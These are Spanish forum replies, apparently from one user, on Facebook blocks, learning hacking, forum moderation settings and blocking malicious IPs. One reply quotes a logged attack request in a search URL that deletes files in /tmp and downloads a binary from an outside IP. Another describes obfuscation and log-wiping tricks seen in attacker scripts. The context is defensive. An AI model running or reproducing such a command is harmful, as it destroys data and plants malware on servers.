Hola, puede ser como dijo el compañero de arriba, que te hagan bloqueado o que la cuenta de tus amigos hayan sido eliminadas, y en ese caso esos perfiles ya no existen en Facebook o tal vez Facebook los ha baneado.


Saludos

Hola, yo creo que sí es difícil porque es como estudiar una carrera, que no tan solo es estudiar mucho, sino practicar e incluso en el hacking, el límite para aprender es ilimitado porque siempre se actualiza la tecnología y hay que estudiar lo nuevo o por ejemplo si se descubre un bug 0day, ahi ya se aprende algo nuevo y hasta se puede aprender a parcharlo.

Yo creo que es una vocación, y no, no es para todos.


Saludos

Si es buena idea reportar esas IPs maliciosas, de hecho esta misma petición ya aparece en Google, ya lo han reportado en varios sitios:

https://www.google.com.ar/search?&q=Re%3A+GET+%2Fshell%3Fcd%2B%2Ftmp%3Brm%2B-rf%2B*%3Bwget%2B185.172.111.214%2Fbins%2FUnHAnaAW.x86

En mí servidor VPS no disponía de CloudFlare.

Eso estamos esperando el reporte completo del log del mod_security


Saludos

Hola,


Seguro que WhatsApp te pedira que crees una porque es un requisito obligatorio.


Saludos

Cuándo yo tenía mi foro tenía solicitudes como esas y lo que hacía algunas veces era entrar a esas URL pero desde un script en python nunca del navegador (excepto si usaba view-source:URL) y hasta usaba un proxy anónimo o después cambiaba la IP, cuando entraba en esa dirección guardaba la salida de la descarga en un archivo txt y lo analizaba, algunas veces encontraba código javascript con una redirección a otra URL o a otra IP, pero quería ver el destino, que es lo que realmente quería el atacante que descargue el servidor, y eran script en bash, perl o python, incluso hasta algunos eran en javascript, supongo que javascript para inyectar código malicioso en archivos PHP.

La verdad es interesante ver a dónde van y que contiene lo que te quieren hacer descargar, se puede aprender de esos códigos porque muchos son códigos privados que solo los atacantes los crean, no están publicados, se puede aprender la forma que utilizan para infectar, para no ser detectados, te hacen descargar cosas, instalarlas o llevarte datos de tu servidor al suyo y después borrar todo, por ejemplo borrar los logs, ademas he llegado a ver hasta códigos en reverso y después lo invertian y los ejecutaban, incluso hasta usaban varios lenguajes, por ejemplo te querían descargar en el servidor un archivo bash pero este a su vez descargaba uno en Python y desde Python ejecutaban otro en Perl.

También en esos códigos se podía ver cómo hacían todas las instrucciones y después borraban todo automáticamente para no dejar rastros, pero las formas y métodos que usaban eran interesante, lo mismo con los códigos que los programaban para que hagan tal cosa y realmente hasta sorprendía la forma que utilizaban de lograr lo que querían, todo eso lo analizaba y aprendía.

Otras veces cuando miraba el log de accesos veía como inventaban el URL Referer, ponían páginas o direcciones de IP con datos para que me interese y acceda, como si fuera que en tal dominios o IPs habían datos de mi foro o algo por el estilo, y analizaba esas direcciones desde modo raw mostrando por consola lo que había en el destino o guardaba la salida en un txt y lo miraba, y casi siempre eran puros virus para que los descargue desde el navegador apenas entre a esa dirección, de todas maneras yo usaba Firefox última versión, tenía todas las actualizaciones de Windows, tenía de firewall Comodo, además de Malwarebytes analizando todo el tiempo y también el Malwarebytes anti-rootkit, etc.

Otras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Llegué a ver también que en los archivos por ejemplo de Python usaban números chars (por ejemplo chr(99)) y estos los unian para formar comandos y así ejecutarlos.


Saludos

Hola, cómo vas a hacer y pedir eso?, Aparte de conseguir claves personales, pensas y querés ingresar en esas cuentas que has hackeado!! 0 ética lo tuyo, buscar en Google en dónde están registradas esas cuentas ajenas y después acceder a ellas no está nada bien.


Saludos

Hola, para que nos comentas eso?, vas a aportar al foro tu creación en batch?, hasta ahora no veo el código.


Saludos

Hola, lo de que el usuario pueda bloquear su propio tema, es un permiso que se lo puede asignar, pero por ejemplo puede pasar lo siguiente:

1. El usuario pide ayuda.
2. El usuario mismo logra solucionar el problema o encuentra ayuda en otro lado.
3. El usuario bloquea su propio tema porque ya está resuelto el mismo.
4. E usuario se olvida de dejar la solución.
5. Varios usuarios quedaron con la duda de como soluciono el problema, ya sea porque han tenido o tienen el mismo problema o por curiosidad o incluso para aprender algo nuevo, pero el tema del usuario al estar bloqueado no pueden pedirle que deje la solución y ahí quedará todo, sin solución y sin la posibilidad de que los usuarios puedan pedirle al autor del tema que deje la explicación de cómo lo ha solucionado.

Con respecto a cerrar el tema para evitar que lo revivan en un futuro, existe un mod que hace posible eso de forma automática (auto-bloqueo):

Auto Lock Old Topics ===> https://custom.simplemachines.org/mods/index.php?mod=2040

Lo de eliminar mensajes no es buena opción, porque por ejemplo un usuario enojado puede borrar todos sus mensajes y dejar varios o muchos temas con el flujo del diálogo roto, imagina si son temas o mensajes de aportes....  yo creo que lo de modificar sus mensajes es más que suficiente, ahora lo que me llama la atención es que el foro no tiene límites de tiempo para modificar mensajes, se pueden borrar mensajes de hace meses por lo que veo y posiblemente de años también, yo en mí foro les daba a los usuarios el permiso de modificar sus mensajes, pero solo por x tiempo, creo que una hora y después de pasar una hora ya no podían modificar más el mensaje, tuve malas experiencias con usuarios que dejaron vacíos sus mensajes, como no podían borrarlos, los modificaban dejándolos en blanco...

Hasta hace un tiempo el conocido Elektro quería borrar todos sus mensajes de aporte porque tuvo problemas con todo el staff y porque no quería dejar nada de sus aportes en el foro, estaba arrepentido de aportar tanto al foro y quería eliminar todo, te imaginas si hubiese tenido ese permiso.... y una persona como él que tiene conocimientos de programación, se crea un script que borre todo masivamente en apenas minutos....


Saludos

Hola, y dónde aparece para seccionar la pista de audio 3?.


Saludos

Hay administradores que publican esas IPs maliciosas en PasteBin, ya sea el log del ataque o simplemente las IPs solas y como ya sabrán de la misma forma que uno tiene una IP pública y hay gente que molesta, de la misma forma los van a molestar a ellos.

Otra forma es cargar esas IPs en páginas como StopForumSpam.

Yo alguna vez he creado un script en Python que lee el archivo log de accesos cada x tiempo y si detecta x cantidad de solicitudes en x tiempo, las agrega al archivo .htaccess con deny from IP, también se puede comprobar esas IPs con algunas blacklist haciendo un dns, cuando esos atacantes se dan cuenta que hay un sistema automático que las bloquea por intentos de login o por acciones maliciosas, dejan de molestar, además que no pueden porque IP que prueban va derecho a ser bloqueada.

También es posible usar la API de SFP (pero ésta es limitada)

https://www.stopforumspam.com/usage


Saludos